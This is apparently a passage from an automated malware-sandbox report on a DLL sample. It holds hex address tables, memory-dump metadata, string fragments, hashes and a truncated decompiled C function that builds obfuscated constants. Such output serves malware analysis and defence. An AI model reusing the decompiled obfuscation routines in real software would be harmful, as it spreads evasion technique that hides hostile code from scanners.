                                                                                                                                                                            0x02f59e92
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59ea6
                                                                                                                                                                            0x02f59eaf
                                                                                                                                                                            0x02f59eb7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59eb7
                                                                                                                                                                            0x02f59d38
                                                                                                                                                                            0x02f59e5a
                                                                                                                                                                            0x02f59e63
                                                                                                                                                                            0x02f59e65
                                                                                                                                                                            0x02f59c17
                                                                                                                                                                            0x02f59c17
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59c17
                                                                                                                                                                            0x02f59d3e
                                                                                                                                                                            0x02f59d44
                                                                                                                                                                            0x02f59e3c
                                                                                                                                                                            0x02f59e41
                                                                                                                                                                            0x02f59e43
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59e49
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59e49
                                                                                                                                                                            0x02f59d4a
                                                                                                                                                                            0x02f59d50
                                                                                                                                                                            0x02f59e0f
                                                                                                                                                                            0x02f59e14
                                                                                                                                                                            0x02f59e1b
                                                                                                                                                                            0x02f59e23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59e23
                                                                                                                                                                            0x02f59d52
                                                                                                                                                                            0x02f59d58
                                                                                                                                                                            0x02f59db7
                                                                                                                                                                            0x02f59dbe
                                                                                                                                                                            0x02f59dc3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59dc3
                                                                                                                                                                            0x02f59d5a
                                                                                                                                                                            0x02f59d60
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59d82
                                                                                                                                                                            0x02f59d9e
                                                                                                                                                                            0x02f59da3
                                                                                                                                                                            0x02f59da6
                                                                                                                                                                            0x02f59dad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59dad
                                                                                                                                                                            0x02f59af3
                                                                                                                                                                            0x02f59d15
                                                                                                                                                                            0x02f59d1a
                                                                                                                                                                            0x02f59d1c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59d22
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59d22
                                                                                                                                                                            0x02f59af9
                                                                                                                                                                            0x02f59aff
                                                                                                                                                                            0x02f59c82
                                                                                                                                                                            0x02f59c88
                                                                                                                                                                            0x02f5a3dc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a3e2
                                                                                                                                                                            0x02f59c8e
                                                                                                                                                                            0x02f59c94
                                                                                                                                                                            0x02f59cf8
                                                                                                                                                                            0x02f59cfd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59cfd
                                                                                                                                                                            0x02f59c96
                                                                                                                                                                            0x02f59c9c
                                                                                                                                                                            0x02f59cdb
                                                                                                                                                                            0x02f59ce0
                                                                                                                                                                            0x02f59ce7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59ce7
                                                                                                                                                                            0x02f59c9e
                                                                                                                                                                            0x02f59ca4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59cc3
                                                                                                                                                                            0x02f59cca
                                                                                                                                                                            0x02f59cca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59cca
                                                                                                                                                                            0x02f59b05
                                                                                                                                                                            0x02f59c63
                                                                                                                                                                            0x02f59c68
                                                                                                                                                                            0x02f59c6f
                                                                                                                                                                            0x02f59c77
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59c77
                                                                                                                                                                            0x02f59b11
                                                                                                                                                                            0x02f59bf6
                                                                                                                                                                            0x02f59bfb
                                                                                                                                                                            0x02f59bfd
                                                                                                                                                                            0x02f59c26
                                                                                                                                                                            0x02f59c2f
                                                                                                                                                                            0x02f59c37
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59c37
                                                                                                                                                                            0x02f59c06
                                                                                                                                                                            0x02f59c0f
                                                                                                                                                                            0x02f59c11
                                                                                                                                                                            0x02f59c11
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59c11
                                                                                                                                                                            0x02f59b1d
                                                                                                                                                                            0x02f59bd1
                                                                                                                                                                            0x02f59bd6
                                                                                                                                                                            0x02f59bd8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59bde
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59bde
                                                                                                                                                                            0x02f59b29
                                                                                                                                                                            0x02f59b61
                                                                                                                                                                            0x02f59b68
                                                                                                                                                                            0x02f59bbc
                                                                                                                                                                            0x02f59bbc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59bbc
                                                                                                                                                                            0x02f59b95
                                                                                                                                                                            0x02f59b9a
                                                                                                                                                                            0x02f59b9d
                                                                                                                                                                            0x02f59ba4
                                                                                                                                                                            0x02f59bb7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59ba6
                                                                                                                                                                            0x02f59ba6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59ba6
                                                                                                                                                                            0x02f59ba4
                                                                                                                                                                            0x02f59b31
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59b37
                                                                                                                                                                            0x02f59b50
                                                                                                                                                                            0x02f59b57
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59b57
                                                                                                                                                                            0x02f59f21
                                                                                                                                                                            0x02f59f21
                                                                                                                                                                            0x02f59f27
                                                                                                                                                                            0x02f5a137
                                                                                                                                                                            0x02f5a13d
                                                                                                                                                                            0x02f5a284
                                                                                                                                                                            0x02f5a28a
                                                                                                                                                                            0x02f5a3af
                                                                                                                                                                            0x02f5a3b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a3b4
                                                                                                                                                                            0x02f5a290
                                                                                                                                                                            0x02f5a296
                                                                                                                                                                            0x02f5a399
                                                                                                                                                                            0x02f5a39e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a39e
                                                                                                                                                                            0x02f5a29c
                                                                                                                                                                            0x02f5a2a2
                                                                                                                                                                            0x02f5a2db
                                                                                                                                                                            0x02f5a2fd
                                                                                                                                                                            0x02f5a319
                                                                                                                                                                            0x02f5a325
                                                                                                                                                                            0x02f5a33b
                                                                                                                                                                            0x02f5a356
                                                                                                                                                                            0x02f5a381
                                                                                                                                                                            0x02f5a386
                                                                                                                                                                            0x02f5a386
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a2a2
                                                                                                                                                                            0x02f5a143
                                                                                                                                                                            0x02f5a27a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a27a
                                                                                                                                                                            0x02f5a149
                                                                                                                                                                            0x02f5a14f
                                                                                                                                                                            0x02f5a1dd
                                                                                                                                                                            0x02f5a1e2
                                                                                                                                                                            0x02f5a1e7
                                                                                                                                                                            0x02f5a1ea
                                                                                                                                                                            0x02f5a1ec
                                                                                                                                                                            0x02f5a1f4
                                                                                                                                                                            0x02f5a1fb
                                                                                                                                                                            0x02f5a1fd
                                                                                                                                                                            0x02f5a218
                                                                                                                                                                            0x02f5a219
                                                                                                                                                                            0x02f5a22a
                                                                                                                                                                            0x02f5a22c
                                                                                                                                                                            0x02f5a22f
                                                                                                                                                                            0x02f5a22f
                                                                                                                                                                            0x02f5a236
                                                                                                                                                                            0x02f5a239
                                                                                                                                                                            0x02f5a254
                                                                                                                                                                            0x02f5a255
                                                                                                                                                                            0x02f5a264
                                                                                                                                                                            0x02f5a269
                                                                                                                                                                            0x02f5a26c
                                                                                                                                                                            0x02f5a26c
                                                                                                                                                                            0x02f5a1ee
                                                                                                                                                                            0x02f5a1ee
                                                                                                                                                                            0x02f5a1ee
                                                                                                                                                                            0x02f5a26e
                                                                                                                                                                            0x02f5a270
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a270
                                                                                                                                                                            0x02f5a151
                                                                                                                                                                            0x02f5a153
                                                                                                                                                                            0x02f5a1b4
                                                                                                                                                                            0x02f5a1b9
                                                                                                                                                                            0x02f5a1ba
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a1ba
                                                                                                                                                                            0x02f5a155
                                                                                                                                                                            0x02f5a15b
                                                                                                                                                                            0x02f5a18c
                                                                                                                                                                            0x02f5a191
                                                                                                                                                                            0x02f5a198
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a198
                                                                                                                                                                            0x02f5a15d
                                                                                                                                                                            0x02f5a163
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a169
                                                                                                                                                                            0x02f5a170
                                                                                                                                                                            0x02f5a172
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a172
                                                                                                                                                                            0x02f59f2d
                                                                                                                                                                            0x02f5a121
                                                                                                                                                                            0x02f5a126
                                                                                                                                                                            0x02f5a12d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a12d
                                                                                                                                                                            0x02f59f33
                                                                                                                                                                            0x02f59f39
                                                                                                                                                                            0x02f59fd2
                                                                                                                                                                            0x02f59fd8
                                                                                                                                                                            0x02f5a106
                                                                                                                                                                            0x02f5a10b
                                                                                                                                                                            0x02f5a10d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a113
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a113
                                                                                                                                                                            0x02f59fde
                                                                                                                                                                            0x02f59fe4
                                                                                                                                                                            0x02f5a0e4
                                                                                                                                                                            0x02f5a0e9
                                                                                                                                                                            0x02f5a0eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0f1
                                                                                                                                                                            0x02f59fea
                                                                                                                                                                            0x02f59ff0
                                                                                                                                                                            0x02f5a066
                                                                                                                                                                            0x02f5a06d
                                                                                                                                                                            0x02f5a072
                                                                                                                                                                            0x02f5a075
                                                                                                                                                                            0x02f5a077
                                                                                                                                                                            0x02f5a0b0
                                                                                                                                                                            0x02f5a0b7
                                                                                                                                                                            0x02f5a0ba
                                                                                                                                                                            0x02f5a0c6
                                                                                                                                                                            0x02f5a0c8
                                                                                                                                                                            0x02f5a0d3
                                                                                                                                                                            0x02f5a0d3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0d3
                                                                                                                                                                            0x02f5a0ca
                                                                                                                                                                            0x02f5a0cd
                                                                                                                                                                            0x02f59f85
                                                                                                                                                                            0x02f59f85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59f85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0cd
                                                                                                                                                                            0x02f5a0bc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0bc
                                                                                                                                                                            0x02f5a08f
                                                                                                                                                                            0x02f5a090
                                                                                                                                                                            0x02f5a09f
                                                                                                                                                                            0x02f5a0a4
                                                                                                                                                                            0x02f5a0a7
                                                                                                                                                                            0x02f5a0a9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a0a9
                                                                                                                                                                            0x02f59ff2
                                                                                                                                                                            0x02f59ff8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a00c
                                                                                                                                                                            0x02f5a015
                                                                                                                                                                            0x02f5a029
                                                                                                                                                                            0x02f5a02a
                                                                                                                                                                            0x02f5a039
                                                                                                                                                                            0x02f5a03e
                                                                                                                                                                            0x02f5a041
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a041
                                                                                                                                                                            0x02f59f3f
                                                                                                                                                                            0x02f59fc3
                                                                                                                                                                            0x02f59fc8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59fc8
                                                                                                                                                                            0x02f59f41
                                                                                                                                                                            0x02f59f47
                                                                                                                                                                            0x02f5a401
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a401
                                                                                                                                                                            0x02f59f4d
                                                                                                                                                                            0x02f59f53
                                                                                                                                                                            0x02f59fb0
                                                                                                                                                                            0x02f59fb5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59fb5
                                                                                                                                                                            0x02f59f55
                                                                                                                                                                            0x02f59f5b
                                                                                                                                                                            0x02f59f9a
                                                                                                                                                                            0x02f59f9f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59f9f
                                                                                                                                                                            0x02f59f5d
                                                                                                                                                                            0x02f59f63
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59f70
                                                                                                                                                                            0x02f59f75
                                                                                                                                                                            0x02f59f77
                                                                                                                                                                            0x02f59f80
                                                                                                                                                                            0x02f59f80
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f59f77
                                                                                                                                                                            0x02f5a3b9
                                                                                                                                                                            0x02f5a3b9
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
                                                                                                                                                                            • API String ID: 0-3734606162
                                                                                                                                                                            • Opcode ID: 1a6d94456a0209c9d0c72a4958a5eec00a9df811dad69c89b963e3a2b487c460
                                                                                                                                                                            • Instruction ID: defb11d7fc6b6913915dbb25e3763868624574d84daa81078dbf8a2fdd29861d
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a6d94456a0209c9d0c72a4958a5eec00a9df811dad69c89b963e3a2b487c460
                                                                                                                                                                            • Instruction Fuzzy Hash: C6E20171908381CBD378CF25C9896DFBBE1BB85358F10891DEADA96260DBB14945CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 263 2f5a871-2f5b3ee call 2f71f6d 266 2f5b3f0-2f5b3f6 263->266 267 2f5b3fc 266->267 268 2f5b679-2f5b67f 266->268 271 2f5b652-2f5b674 call 2f72b09 267->271 272 2f5b402-2f5b408 267->272 269 2f5b685-2f5b68b 268->269 270 2f5b7ba-2f5b7de call 2f70a64 268->270 274 2f5b691-2f5b697 269->274 275 2f5b780-2f5b7b5 call 2f6d8db 269->275 294 2f5b7e0-2f5b7e5 270->294 295 2f5b7ea 270->295 271->266 277 2f5b5b7-2f5b64d call 2f6e1f8 call 2f744ad call 2f6fecb 272->277 278 2f5b40e-2f5b414 272->278 283 2f5b73d-2f5b77b call 2f51a34 274->283 284 2f5b69d-2f5b6a3 274->284 275->266 277->266 279 2f5b57a-2f5b5b2 call 2f685ff 278->279 280 2f5b41a-2f5b420 278->280 279->266 288 2f5b422-2f5b428 280->288 289 2f5b45f-2f5b56a call 2f70db1 call 2f609dd call 2f5baa9 call 2f6e1f8 call 2f72d0a call 2f6fecb call 2f5bfbe 280->289 283->266 292 2f5b7ef-2f5b7f5 284->292 293 2f5b6a9-2f5b72d call 2f60cf9 call 2f600c5 call 2f5f726 284->293 298 2f5b7fd-2f5b814 call 2f71538 288->298 299 2f5b42e-2f5b434 288->299 308 2f5b815-2f5b81f 289->308 333 2f5b570-2f5b575 289->333 292->266 303 2f5b7fb 292->303 293->308 325 2f5b733-2f5b738 293->325 294->266 295->292 298->308 299->292 305 2f5b43a-2f5b45d call 2f72b09 299->305 303->308 305->266 325->266 333->266
                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F5A871(void* __ecx) {
                                                                                                                                                                            				char _v524;
                                                                                                                                                                            				char _v1044;
                                                                                                                                                                            				char _v1564;
                                                                                                                                                                            				char _v2084;
                                                                                                                                                                            				char _v2604;
                                                                                                                                                                            				signed int _v2608;
                                                                                                                                                                            				signed int _v2612;
                                                                                                                                                                            				intOrPtr _v2616;
                                                                                                                                                                            				intOrPtr _v2620;
                                                                                                                                                                            				intOrPtr _v2624;
                                                                                                                                                                            				char _v2628;
                                                                                                                                                                            				intOrPtr _v2632;
                                                                                                                                                                            				char _v2636;
                                                                                                                                                                            				signed int _v2640;
                                                                                                                                                                            				signed int _v2644;
                                                                                                                                                                            				signed int _v2648;
                                                                                                                                                                            				signed int _v2652;
                                                                                                                                                                            				signed int _v2656;
                                                                                                                                                                            				signed int _v2660;
                                                                                                                                                                            				signed int _v2664;
                                                                                                                                                                            				signed int _v2668;
                                                                                                                                                                            				signed int _v2672;
                                                                                                                                                                            				signed int _v2676;
                                                                                                                                                                            				signed int _v2680;
                                                                                                                                                                            				signed int _v2684;
                                                                                                                                                                            				signed int _v2688;
                                                                                                                                                                            				signed int _v2692;
                                                                                                                                                                            				signed int _v2696;
                                                                                                                                                                            				signed int _v2700;
                                                                                                                                                                            				signed int _v2704;
                                                                                                                                                                            				signed int _v2708;
                                                                                                                                                                            				signed int _v2712;
                                                                                                                                                                            				signed int _v2716;
                                                                                                                                                                            				signed int _v2720;
                                                                                                                                                                            				signed int _v2724;
                                                                                                                                                                            				signed int _v2728;
                                                                                                                                                                            				signed int _v2732;
                                                                                                                                                                            				signed int _v2736;
                                                                                                                                                                            				signed int _v2740;
                                                                                                                                                                            				signed int _v2744;
                                                                                                                                                                            				signed int _v2748;
                                                                                                                                                                            				signed int _v2752;
                                                                                                                                                                            				signed int _v2756;
                                                                                                                                                                            				signed int _v2760;
                                                                                                                                                                            				unsigned int _v2764;
                                                                                                                                                                            				signed int _v2768;
                                                                                                                                                                            				signed int _v2772;
                                                                                                                                                                            				signed int _v2776;
                                                                                                                                                                            				signed int _v2780;
                                                                                                                                                                            				signed int _v2784;
                                                                                                                                                                            				signed int _v2788;
                                                                                                                                                                            				signed int _v2792;
                                                                                                                                                                            				signed int _v2796;
                                                                                                                                                                            				signed int _v2800;
                                                                                                                                                                            				signed int _v2804;
                                                                                                                                                                            				signed int _v2808;
                                                                                                                                                                            				signed int _v2812;
                                                                                                                                                                            				signed int _v2816;
                                                                                                                                                                            				signed int _v2820;
                                                                                                                                                                            				signed int _v2824;
                                                                                                                                                                            				signed int _v2828;
                                                                                                                                                                            				signed int _v2832;
                                                                                                                                                                            				signed int _v2836;
                                                                                                                                                                            				signed int _v2840;
                                                                                                                                                                            				signed int _v2844;
                                                                                                                                                                            				signed int _v2848;
                                                                                                                                                                            				signed int _v2852;
                                                                                                                                                                            				signed int _v2856;
                                                                                                                                                                            				signed int _v2860;
                                                                                                                                                                            				signed int _v2864;
                                                                                                                                                                            				signed int _v2868;
                                                                                                                                                                            				signed int _v2872;
                                                                                                                                                                            				signed int _v2876;
                                                                                                                                                                            				signed int _v2880;
                                                                                                                                                                            				signed int _v2884;
                                                                                                                                                                            				signed int _v2888;
                                                                                                                                                                            				signed int _v2892;
                                                                                                                                                                            				signed int _v2896;
                                                                                                                                                                            				signed int _v2900;
                                                                                                                                                                            				signed int _v2904;
                                                                                                                                                                            				signed int _v2908;
                                                                                                                                                                            				signed int _v2912;
                                                                                                                                                                            				signed int _v2916;
                                                                                                                                                                            				signed int _v2920;
                                                                                                                                                                            				signed int _v2924;
                                                                                                                                                                            				signed int _v2928;
                                                                                                                                                                            				signed int _v2932;
                                                                                                                                                                            				void* _t731;
                                                                                                                                                                            				signed int _t732;
                                                                                                                                                                            				signed int _t733;
                                                                                                                                                                            				signed int _t743;
                                                                                                                                                                            				signed int _t758;
                                                                                                                                                                            				void* _t761;
                                                                                                                                                                            				signed int _t763;
                                                                                                                                                                            				signed int _t764;
                                                                                                                                                                            				signed int _t765;
                                                                                                                                                                            				signed int _t766;
                                                                                                                                                                            				signed int _t767;
                                                                                                                                                                            				signed int _t768;
                                                                                                                                                                            				signed int _t769;
                                                                                                                                                                            				signed int _t770;
                                                                                                                                                                            				signed int _t771;
                                                                                                                                                                            				signed int _t772;
                                                                                                                                                                            				signed int _t773;
                                                                                                                                                                            				signed int _t774;
                                                                                                                                                                            				signed int _t775;
                                                                                                                                                                            				signed int _t776;
                                                                                                                                                                            				signed int _t777;
                                                                                                                                                                            				signed int _t778;
                                                                                                                                                                            				signed int _t779;
                                                                                                                                                                            				signed int _t780;
                                                                                                                                                                            				signed int _t783;
                                                                                                                                                                            				void* _t804;
                                                                                                                                                                            				void* _t861;
                                                                                                                                                                            				signed int _t865;
                                                                                                                                                                            				void* _t867;
                                                                                                                                                                            				signed int* _t868;
                                                                                                                                                                            				void* _t874;
                                                                                                                                                                            
                                                                                                                                                                            				_t868 =  &_v2932;
                                                                                                                                                                            				_v2612 = _v2612 & 0x00000000;
                                                                                                                                                                            				_v2608 = _v2608 & 0x00000000;
                                                                                                                                                                            				_v2616 = 0x74b642;
                                                                                                                                                                            				_v2776 = 0xf885ca;
                                                                                                                                                                            				_v2776 = _v2776 | 0xffdfd4be;
                                                                                                                                                                            				_v2776 = _v2776 ^ 0xffffd5d7;
                                                                                                                                                                            				_v2704 = 0xd88538;
                                                                                                                                                                            				_v2704 = _v2704 + 0xebcf;
                                                                                                                                                                            				_v2704 = _v2704 ^ 0x00c97107;
                                                                                                                                                                            				_v2800 = 0xd52646;
                                                                                                                                                                            				_v2800 = _v2800 ^ 0xe8dc52fe;
                                                                                                                                                                            				_v2800 = _v2800 + 0xffffe935;
                                                                                                                                                                            				_v2800 = _v2800 ^ 0xe804d8f6;
                                                                                                                                                                            				_v2688 = 0xbafe67;
                                                                                                                                                                            				_v2688 = _v2688 + 0x9481;
                                                                                                                                                                            				_v2688 = _v2688 ^ 0x00b13019;
                                                                                                                                                                            				_v2884 = 0x3d12e1;
                                                                                                                                                                            				_v2884 = _v2884 << 1;
                                                                                                                                                                            				_v2884 = _v2884 * 0x55;
                                                                                                                                                                            				_t867 = __ecx;
                                                                                                                                                                            				_t861 = 0xbf2cce3;
                                                                                                                                                                            				_t763 = 0x73;
                                                                                                                                                                            				_v2884 = _v2884 * 0xf;
                                                                                                                                                                            				_v2884 = _v2884 ^ 0x605e8f7b;
                                                                                                                                                                            				_v2696 = 0xf649d9;
                                                                                                                                                                            				_v2696 = _v2696 / _t763;
                                                                                                                                                                            				_v2696 = _v2696 ^ 0x000dd9df;
                                                                                                                                                                            				_v2764 = 0x4a6242;
                                                                                                                                                                            				_v2764 = _v2764 + 0xffff45cb;
                                                                                                                                                                            				_v2764 = _v2764 >> 0xc;
                                                                                                                                                                            				_v2764 = _v2764 ^ 0x000572e2;
                                                                                                                                                                            				_v2784 = 0x8333a2;
                                                                                                                                                                            				_t764 = 0x2e;
                                                                                                                                                                            				_v2784 = _v2784 / _t764;
                                                                                                                                                                            				_v2784 = _v2784 + 0xffffe135;
                                                                                                                                                                            				_v2784 = _v2784 ^ 0x0005b928;
                                                                                                                                                                            				_v2852 = 0xf9a739;
                                                                                                                                                                            				_v2852 = _v2852 | 0x42d1f5c6;
                                                                                                                                                                            				_v2852 = _v2852 + 0xfffff01c;
                                                                                                                                                                            				_v2852 = _v2852 ^ 0x42f87d02;
                                                                                                                                                                            				_v2896 = 0x31e192;
                                                                                                                                                                            				_v2896 = _v2896 << 0xa;
                                                                                                                                                                            				_v2896 = _v2896 << 0xa;
                                                                                                                                                                            				_t765 = 0xb;
                                                                                                                                                                            				_v2896 = _v2896 * 0x26;
                                                                                                                                                                            				_v2896 = _v2896 ^ 0xbac011ee;
                                                                                                                                                                            				_v2928 = 0xcde58e;
                                                                                                                                                                            				_v2928 = _v2928 | 0x2bdbfaea;
                                                                                                                                                                            				_v2928 = _v2928 << 8;
                                                                                                                                                                            				_v2928 = _v2928 | 0x4ddc4764;
                                                                                                                                                                            				_v2928 = _v2928 ^ 0xdffb1335;
                                                                                                                                                                            				_v2740 = 0xd63953;
                                                                                                                                                                            				_v2740 = _v2740 + 0x5c5c;
                                                                                                                                                                            				_v2740 = _v2740 ^ 0x00d7db1f;
                                                                                                                                                                            				_v2844 = 0x6db889;
                                                                                                                                                                            				_v2844 = _v2844 + 0x1eed;
                                                                                                                                                                            				_v2844 = _v2844 / _t765;
                                                                                                                                                                            				_v2844 = _v2844 ^ 0x0002c3cf;
                                                                                                                                                                            				_v2796 = 0x98820d;
                                                                                                                                                                            				_v2796 = _v2796 | 0x8cff8acf;
                                                                                                                                                                            				_t766 = 0x43;
                                                                                                                                                                            				_v2796 = _v2796 / _t766;
                                                                                                                                                                            				_v2796 = _v2796 ^ 0x021946ce;
                                                                                                                                                                            				_v2668 = 0x18627d;
                                                                                                                                                                            				_t767 = 7;
                                                                                                                                                                            				_v2668 = _v2668 / _t767;
                                                                                                                                                                            				_v2668 = _v2668 ^ 0x00044156;
                                                                                                                                                                            				_v2772 = 0x2c7378;
                                                                                                                                                                            				_v2772 = _v2772 >> 0xb;
                                                                                                                                                                            				_v2772 = _v2772 >> 6;
                                                                                                                                                                            				_v2772 = _v2772 ^ 0x000b6d9a;
                                                                                                                                                                            				_v2880 = 0xd4c7fd;
                                                                                                                                                                            				_t768 = 0x7b;
                                                                                                                                                                            				_v2880 = _v2880 / _t768;
                                                                                                                                                                            				_v2880 = _v2880 + 0xffffaacc;
                                                                                                                                                                            				_t769 = 0x22;
                                                                                                                                                                            				_v2880 = _v2880 * 0x2f;
                                                                                                                                                                            				_v2880 = _v2880 ^ 0x00480dcd;
                                                                                                                                                                            				_v2920 = 0xe4d6f8;
                                                                                                                                                                            				_v2920 = _v2920 * 0x42;
                                                                                                                                                                            				_v2920 = _v2920 + 0xa0b6;
                                                                                                                                                                            				_v2920 = _v2920 << 8;
                                                                                                                                                                            				_v2920 = _v2920 ^ 0x000574ec;
                                                                                                                                                                            				_v2640 = 0xd6ae6b;
                                                                                                                                                                            				_v2640 = _v2640 | 0xbe6f316b;
                                                                                                                                                                            				_v2640 = _v2640 ^ 0xbefadf9c;
                                                                                                                                                                            				_v2836 = 0x6fb4;
                                                                                                                                                                            				_v2836 = _v2836 + 0xffffc368;
                                                                                                                                                                            				_v2836 = _v2836 >> 0x10;
                                                                                                                                                                            				_v2836 = _v2836 ^ 0x0009680a;
                                                                                                                                                                            				_v2724 = 0x8b61bc;
                                                                                                                                                                            				_v2724 = _v2724 * 0x75;
                                                                                                                                                                            				_v2724 = _v2724 ^ 0x3fbdc7d4;
                                                                                                                                                                            				_v2912 = 0x753704;
                                                                                                                                                                            				_v2912 = _v2912 >> 0xb;
                                                                                                                                                                            				_v2912 = _v2912 + 0xd457;
                                                                                                                                                                            				_v2912 = _v2912 << 1;
                                                                                                                                                                            				_v2912 = _v2912 ^ 0x000d652f;
                                                                                                                                                                            				_v2716 = 0xde59a0;
                                                                                                                                                                            				_v2716 = _v2716 + 0xffff5778;
                                                                                                                                                                            				_v2716 = _v2716 ^ 0x00d8a7a4;
                                                                                                                                                                            				_v2752 = 0x428dcf;
                                                                                                                                                                            				_v2752 = _v2752 / _t769;
                                                                                                                                                                            				_v2752 = _v2752 | 0x08d5d60c;
                                                                                                                                                                            				_v2752 = _v2752 ^ 0x08d7d48c;
                                                                                                                                                                            				_v2828 = 0xe83a42;
                                                                                                                                                                            				_v2828 = _v2828 ^ 0x1f3eb5e2;
                                                                                                                                                                            				_v2828 = _v2828 * 0x7e;
                                                                                                                                                                            				_v2828 = _v2828 ^ 0xab9e63e1;
                                                                                                                                                                            				_v2788 = 0x69d445;
                                                                                                                                                                            				_v2788 = _v2788 | 0x87a4a8ed;
                                                                                                                                                                            				_v2788 = _v2788 ^ 0x9a4d3e24;
                                                                                                                                                                            				_v2788 = _v2788 ^ 0x1da0be74;
                                                                                                                                                                            				_v2888 = 0x7663d0;
                                                                                                                                                                            				_v2888 = _v2888 | 0x8f53a1f3;
                                                                                                                                                                            				_v2888 = _v2888 >> 0xf;
                                                                                                                                                                            				_v2888 = _v2888 * 0xa;
                                                                                                                                                                            				_v2888 = _v2888 ^ 0x000d5ba1;
                                                                                                                                                                            				_v2644 = 0x20e74e;
                                                                                                                                                                            				_v2644 = _v2644 | 0x742f98e9;
                                                                                                                                                                            				_v2644 = _v2644 ^ 0x74210d1b;
                                                                                                                                                                            				_v2904 = 0xfccdb4;
                                                                                                                                                                            				_t770 = 0xd;
                                                                                                                                                                            				_v2904 = _v2904 * 0x7c;
                                                                                                                                                                            				_v2904 = _v2904 >> 0xd;
                                                                                                                                                                            				_v2904 = _v2904 | 0x17cf49de;
                                                                                                                                                                            				_v2904 = _v2904 ^ 0x17c7aae5;
                                                                                                                                                                            				_v2708 = 0xc1d2f2;
                                                                                                                                                                            				_v2708 = _v2708 + 0xffff5a94;
                                                                                                                                                                            				_v2708 = _v2708 ^ 0x00cb5d75;
                                                                                                                                                                            				_v2660 = 0x58d6fe;
                                                                                                                                                                            				_v2660 = _v2660 + 0x639e;
                                                                                                                                                                            				_v2660 = _v2660 ^ 0x00518056;
                                                                                                                                                                            				_v2652 = 0x6bd84b;
